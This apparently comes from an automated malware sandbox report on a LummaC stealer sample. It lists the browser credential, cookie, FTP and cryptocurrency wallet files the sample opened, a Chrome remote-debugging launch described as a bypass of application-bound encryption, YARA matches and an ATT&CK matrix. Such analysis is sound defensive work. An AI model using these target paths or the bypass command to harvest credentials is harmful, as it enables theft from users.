Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\prefs.js	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Directory queried: number of queries: 1002

Source: Yara match	File source: 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 9160, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 9160, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 Network Service Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Create Account	1 Extra Window Memory Injection	3 Obfuscated Files or Information	LSASS Memory	21 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	2 Software Packing	Security Account Manager	24 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	1 Scheduled Task/Job	1 DLL Side-Loading	NTDS	211 Security Software Discovery	Distributed Component Object Model	2 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Extra Window Memory Injection	LSA Secrets	11 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
